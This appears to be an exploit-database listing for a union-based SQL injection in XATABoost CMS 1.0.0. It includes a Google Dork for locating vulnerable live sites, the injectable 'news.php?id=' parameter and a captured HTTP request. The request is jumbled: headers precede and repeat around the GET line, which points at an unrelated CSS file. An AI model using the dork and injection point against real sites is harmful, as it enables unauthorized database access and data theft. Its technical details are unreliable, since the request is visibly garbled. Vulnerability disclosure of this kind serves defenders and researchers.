XATABoost 1.0.0 SQL Injection

XATABoost version 1.0.0 suffers from a remote SQL injection vulnerability.


MD5 | f10d0c627bcc189cec5effc5ae675414

# Exploit Title: XATABoost CMS Sql Injection

# Google Dork: inurl:php?id= Powered by XATABOOST
# Date: 02.01.2018
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: http://www2.xataboost.com

# Version: 1.0.0
# Tested on: Kali Linux

# SQL Injection Type: Union Based

# Example URL: http://localhost/news.php?id=[Injection Point]

Accept-Encoding: gzip, deflate
Referer: http://localhost/news.php?id=[Injection Point]
Connection: keep-alive
GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/news.php?id=[Injection Point]

Related Posts